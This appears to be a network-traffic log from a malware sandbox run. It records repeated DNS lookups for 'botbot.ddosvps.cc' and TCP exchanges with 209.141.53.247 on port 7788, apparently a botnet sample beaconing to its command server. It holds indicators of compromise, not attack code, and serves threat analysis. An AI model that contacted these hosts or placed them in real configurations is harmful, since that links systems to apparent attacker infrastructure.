                        Jul 2, 2024 18:15:12.843709946 CEST778844678209.141.53.247192.168.2.14
                        Jul 2, 2024 18:15:12.843789101 CEST446787788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:15:12.847867012 CEST446787788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:15:12.852746010 CEST778844678209.141.53.247192.168.2.14
                        TimestampSource PortDest PortSource IPDest IP
                        Jul 2, 2024 18:13:13.965816975 CEST5433353192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:13.970102072 CEST4714353192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:13.972325087 CEST53543338.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:13.976963997 CEST53471438.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:15.599849939 CEST5253853192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:15.603288889 CEST4543253192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:15.606826067 CEST53525388.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:15.609694004 CEST53454328.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:17.234371901 CEST5201253192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:17.236331940 CEST4553253192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:17.240964890 CEST53520128.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:17.243083000 CEST53455328.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:18.839168072 CEST5180553192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:18.839356899 CEST3690053192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:18.846519947 CEST53518058.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:18.847155094 CEST53369008.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:20.561141968 CEST4991153192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:20.561332941 CEST5268153192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:20.766989946 CEST53499118.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:20.768111944 CEST53526818.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:22.389599085 CEST5784153192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:22.389784098 CEST4617453192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:22.396414995 CEST53578418.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:22.397608042 CEST53461748.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:24.183620930 CEST4470353192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:24.186573982 CEST3470353192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:24.191035986 CEST53447038.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:24.194113970 CEST53347038.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:25.790604115 CEST4277553192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:25.793494940 CEST3598853192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:25.797593117 CEST53427758.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:25.799612045 CEST53359888.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:27.399995089 CEST5863953192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:27.400171041 CEST5411853192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:27.407010078 CEST53541188.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:27.408556938 CEST53586398.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:29.031352997 CEST5165653192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:29.032651901 CEST3487953192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:29.039073944 CEST53516568.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:29.042182922 CEST53348798.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:30.636538029 CEST3761953192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:30.640352011 CEST3748353192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:30.644788027 CEST53376198.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:30.650202036 CEST53374838.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:32.284136057 CEST5786753192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:32.284405947 CEST3807853192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:32.291096926 CEST53380788.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:32.291110039 CEST53578678.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:33.886480093 CEST5578553192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:33.886775017 CEST6006253192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:33.892834902 CEST53557858.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:33.893867016 CEST53600628.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:35.498083115 CEST4239653192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:35.501064062 CEST5020153192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:35.505729914 CEST53423968.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:35.508090973 CEST53502018.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:37.126235962 CEST3456653192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:37.127691984 CEST4857053192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:37.132668018 CEST53345668.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:37.134458065 CEST53485708.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:38.730803967 CEST4660853192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:38.730997086 CEST4234953192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:38.737248898 CEST53466088.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:38.737591982 CEST53423498.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:40.587814093 CEST3349353192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:40.588150978 CEST5175153192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:40.612868071 CEST53517518.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:40.612888098 CEST53334938.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:42.215075970 CEST6043753192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:42.215372086 CEST4955453192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:42.221856117 CEST53495548.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:42.222152948 CEST53604378.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:43.828629971 CEST5834553192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:43.831918955 CEST3971753192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:43.836374044 CEST53583458.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:43.839958906 CEST53397178.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:45.472801924 CEST5774653192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:45.474287987 CEST4418853192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:45.479717970 CEST53577468.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:45.480475903 CEST53441888.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:47.253124952 CEST4942153192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:47.254839897 CEST4198953192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:47.260061026 CEST53494218.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:47.261749029 CEST53419898.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:48.874876976 CEST5671753192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:48.875174046 CEST4590753192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:48.881109953 CEST53567178.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:48.881614923 CEST53459078.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:50.498800039 CEST5510353192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:50.502166033 CEST5155153192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:50.505928993 CEST53551038.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:50.509826899 CEST53515518.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:52.119829893 CEST4576353192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:52.122286081 CEST4202153192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:52.127008915 CEST53457638.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:52.129133940 CEST53420218.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:53.729948044 CEST4047553192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:53.730173111 CEST3997353192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:53.736423016 CEST53404758.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:53.737016916 CEST53399738.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:55.477740049 CEST3577553192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:55.477972031 CEST5434053192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:55.484591007 CEST53357758.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:55.484910965 CEST53543408.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:57.110788107 CEST5422053192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:57.110987902 CEST5806853192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:57.117747068 CEST53580688.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:57.118150949 CEST53542208.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:58.734031916 CEST3753953192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:58.734297037 CEST4707953192.168.2.148.8.8.8
                        Jul 2, 2024 18:13:58.740330935 CEST53375398.8.8.8192.168.2.14
                        Jul 2, 2024 18:13:58.741000891 CEST53470798.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:00.357702017 CEST4062353192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:00.360876083 CEST5988553192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:00.364415884 CEST53406238.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:00.367264986 CEST53598858.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:01.974080086 CEST5028553192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:01.974289894 CEST5161153192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:01.980998039 CEST53516118.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:01.981010914 CEST53502858.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:03.608968973 CEST5461253192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:03.609153986 CEST4086553192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:03.615812063 CEST53546128.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:03.615884066 CEST53408658.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:05.230693102 CEST5952753192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:05.233939886 CEST4759853192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:05.239275932 CEST53595278.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:05.243038893 CEST53475988.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:06.858468056 CEST4139653192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:06.858683109 CEST3932153192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:06.865492105 CEST53393218.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:06.865554094 CEST53413968.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:08.489779949 CEST4077753192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:08.489984989 CEST5555453192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:08.496542931 CEST53407778.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:08.497504950 CEST53555548.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:10.104021072 CEST4646853192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:10.104254961 CEST4155753192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:10.110431910 CEST53464688.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:10.111176968 CEST53415578.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:11.733099937 CEST4793053192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:11.733323097 CEST5153553192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:11.739581108 CEST53479308.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:11.740333080 CEST53515358.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:13.340761900 CEST5542553192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:13.340980053 CEST4108553192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:13.347839117 CEST53554258.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:13.347879887 CEST53410858.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:14.950051069 CEST5363153192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:14.950278044 CEST4383553192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:14.956357956 CEST53536318.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:14.956865072 CEST53438358.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:16.590183973 CEST5950053192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:16.591769934 CEST5716353192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:16.597234964 CEST53595008.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:16.598126888 CEST53571638.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:18.216202974 CEST5474853192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:18.216485977 CEST4240753192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:18.222917080 CEST53547488.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:18.224234104 CEST53424078.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:19.847203016 CEST5208953192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:19.848803997 CEST5157053192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:19.853800058 CEST53520898.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:19.855422020 CEST53515708.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:21.463753939 CEST5622153192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:21.463831902 CEST3983453192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:21.470643044 CEST53562218.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:21.470735073 CEST53398348.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:23.243113995 CEST3516853192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:23.243412971 CEST4620153192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:23.249715090 CEST53462018.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:23.249955893 CEST53351688.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:24.859894037 CEST5740953192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:24.860177040 CEST4437753192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:24.866595030 CEST53574098.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:24.867027998 CEST53443778.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:26.478758097 CEST5507153192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:26.478929996 CEST4853153192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:26.486454964 CEST53550718.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:26.486515045 CEST53485318.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:28.096065044 CEST5849853192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:28.096239090 CEST5501653192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:28.102889061 CEST53584988.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:28.102900028 CEST53550168.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:29.717561960 CEST3360553192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:29.721471071 CEST5081953192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:29.728904009 CEST53336058.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:29.731127024 CEST53508198.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:31.363512993 CEST4880353192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:31.364516020 CEST3614553192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:31.370079994 CEST53488038.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:31.372519970 CEST53361458.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:32.979027033 CEST5063153192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:32.979378939 CEST5542853192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:32.987065077 CEST53554288.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:32.987096071 CEST53506318.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:35.368033886 CEST4715653192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:35.372464895 CEST4105753192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:35.376889944 CEST53471568.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:35.380183935 CEST53410578.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:36.981350899 CEST5818453192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:36.982984066 CEST3613353192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:36.987678051 CEST53581848.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:36.991436958 CEST53361338.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:38.591532946 CEST5857653192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:38.591691971 CEST4827053192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:38.598002911 CEST53585768.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:38.598056078 CEST53482708.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:40.221297026 CEST5060753192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:40.221543074 CEST5177753192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:40.228498936 CEST53517778.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:40.228584051 CEST53506078.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:41.823203087 CEST5813153192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:41.823328018 CEST4906953192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:41.829468966 CEST53490698.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:41.830179930 CEST53581318.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:43.438344002 CEST4172353192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:43.440253019 CEST4912253192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:43.445611000 CEST53417238.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:43.446855068 CEST53491228.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:45.067749977 CEST4996053192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:45.069586992 CEST6092153192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:45.074681997 CEST53499608.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:45.076220036 CEST53609218.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:46.684108019 CEST5808053192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:46.685575008 CEST4246753192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:46.691050053 CEST53580808.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:46.691786051 CEST53424678.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:48.291810989 CEST4871853192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:48.291954994 CEST5338453192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:48.298171043 CEST53487188.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:48.298605919 CEST53533848.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:49.921870947 CEST4641253192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:49.922724009 CEST5812153192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:49.928088903 CEST53464128.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:49.929575920 CEST53581218.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:51.532326937 CEST4086653192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:51.532469034 CEST3388653192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:51.541613102 CEST53408668.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:51.542553902 CEST53338868.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:53.172935009 CEST4481753192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:53.173187017 CEST5897853192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:53.179951906 CEST53448178.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:53.180032969 CEST53589788.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:54.794234037 CEST5771353192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:54.794329882 CEST4913153192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:54.804291010 CEST53577138.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:54.804303885 CEST53491318.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:56.436242104 CEST4602753192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:56.438051939 CEST4861653192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:56.443185091 CEST53460278.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:56.444809914 CEST53486168.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:58.044667959 CEST5809553192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:58.044775009 CEST3868353192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:58.052218914 CEST53386838.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:58.052819014 CEST53580958.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:59.668982029 CEST3582353192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:59.673352957 CEST4013853192.168.2.148.8.8.8
                        Jul 2, 2024 18:14:59.675591946 CEST53358238.8.8.8192.168.2.14
                        Jul 2, 2024 18:14:59.680305004 CEST53401388.8.8.8192.168.2.14
                        Jul 2, 2024 18:15:01.315491915 CEST3576653192.168.2.148.8.8.8
                        Jul 2, 2024 18:15:01.316277027 CEST5591853192.168.2.148.8.8.8
                        Jul 2, 2024 18:15:01.322160006 CEST53357668.8.8.8192.168.2.14
                        Jul 2, 2024 18:15:01.322594881 CEST53559188.8.8.8192.168.2.14
                        Jul 2, 2024 18:15:02.917653084 CEST4300753192.168.2.148.8.8.8
                        Jul 2, 2024 18:15:02.917815924 CEST4089753192.168.2.148.8.8.8
                        Jul 2, 2024 18:15:02.924915075 CEST53430078.8.8.8192.168.2.14
                        Jul 2, 2024 18:15:02.926660061 CEST53408978.8.8.8192.168.2.14
                        Jul 2, 2024 18:15:04.526885986 CEST5759753192.168.2.148.8.8.8
                        Jul 2, 2024 18:15:04.529916048 CEST5674053192.168.2.148.8.8.8
                        Jul 2, 2024 18:15:04.533792019 CEST53575978.8.8.8192.168.2.14
                        Jul 2, 2024 18:15:04.536385059 CEST53567408.8.8.8192.168.2.14
                        Jul 2, 2024 18:15:06.334883928 CEST4073353192.168.2.148.8.8.8
                        Jul 2, 2024 18:15:06.335557938 CEST5399753192.168.2.148.8.8.8
                        Jul 2, 2024 18:15:06.343625069 CEST53407338.8.8.8192.168.2.14
                        Jul 2, 2024 18:15:06.343741894 CEST53539978.8.8.8192.168.2.14
                        Jul 2, 2024 18:15:07.978025913 CEST4025653192.168.2.148.8.8.8
                        Jul 2, 2024 18:15:07.978202105 CEST5806753192.168.2.148.8.8.8
                        Jul 2, 2024 18:15:07.984412909 CEST53580678.8.8.8192.168.2.14
                        Jul 2, 2024 18:15:07.984731913 CEST53402568.8.8.8192.168.2.14
                        Jul 2, 2024 18:15:09.592943907 CEST3654353192.168.2.148.8.8.8
                        Jul 2, 2024 18:15:09.595204115 CEST4599353192.168.2.148.8.8.8
                        Jul 2, 2024 18:15:09.599952936 CEST53365438.8.8.8192.168.2.14
                        Jul 2, 2024 18:15:09.602031946 CEST53459938.8.8.8192.168.2.14
                        Jul 2, 2024 18:15:11.201966047 CEST5299453192.168.2.148.8.8.8
                        Jul 2, 2024 18:15:11.203197956 CEST5310153192.168.2.148.8.8.8
                        Jul 2, 2024 18:15:11.210028887 CEST53529948.8.8.8192.168.2.14
                        Jul 2, 2024 18:15:11.211251974 CEST53531018.8.8.8192.168.2.14
                        Jul 2, 2024 18:15:12.829972029 CEST5670353192.168.2.148.8.8.8
                        Jul 2, 2024 18:15:12.830106974 CEST3817253192.168.2.148.8.8.8
                        Jul 2, 2024 18:15:12.836824894 CEST53381728.8.8.8192.168.2.14
                        Jul 2, 2024 18:15:12.837107897 CEST53567038.8.8.8192.168.2.14
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jul 2, 2024 18:13:13.965816975 CEST192.168.2.148.8.8.80x8b90Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:13.970102072 CEST192.168.2.148.8.8.80x170Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:15.599849939 CEST192.168.2.148.8.8.80xdbb3Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:15.603288889 CEST192.168.2.148.8.8.80x6b2cStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:17.234371901 CEST192.168.2.148.8.8.80xc31Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:17.236331940 CEST192.168.2.148.8.8.80x7369Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:18.839168072 CEST192.168.2.148.8.8.80xa416Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:18.839356899 CEST192.168.2.148.8.8.80xd7abStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:20.561141968 CEST192.168.2.148.8.8.80x1175Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:20.561332941 CEST192.168.2.148.8.8.80xed48Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:22.389599085 CEST192.168.2.148.8.8.80x94fbStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:22.389784098 CEST192.168.2.148.8.8.80x7ad1Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:24.183620930 CEST192.168.2.148.8.8.80x7987Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:24.186573982 CEST192.168.2.148.8.8.80x702aStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:25.790604115 CEST192.168.2.148.8.8.80x3702Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:25.793494940 CEST192.168.2.148.8.8.80x11c5Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:27.399995089 CEST192.168.2.148.8.8.80xa02fStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:27.400171041 CEST192.168.2.148.8.8.80xfc61Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:29.031352997 CEST192.168.2.148.8.8.80x1c47Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:29.032651901 CEST192.168.2.148.8.8.80xa206Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:30.636538029 CEST192.168.2.148.8.8.80xafb1Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:30.640352011 CEST192.168.2.148.8.8.80x349aStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:32.284136057 CEST192.168.2.148.8.8.80x20d5Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:32.284405947 CEST192.168.2.148.8.8.80x73f3Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:33.886480093 CEST192.168.2.148.8.8.80x3868Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:33.886775017 CEST192.168.2.148.8.8.80xef6Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:35.498083115 CEST192.168.2.148.8.8.80x51abStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:35.501064062 CEST192.168.2.148.8.8.80x26daStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:37.126235962 CEST192.168.2.148.8.8.80x241bStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:37.127691984 CEST192.168.2.148.8.8.80xcaf0Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:38.730803967 CEST192.168.2.148.8.8.80x55e3Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:38.730997086 CEST192.168.2.148.8.8.80xc9f6Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:40.587814093 CEST192.168.2.148.8.8.80xfd74Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
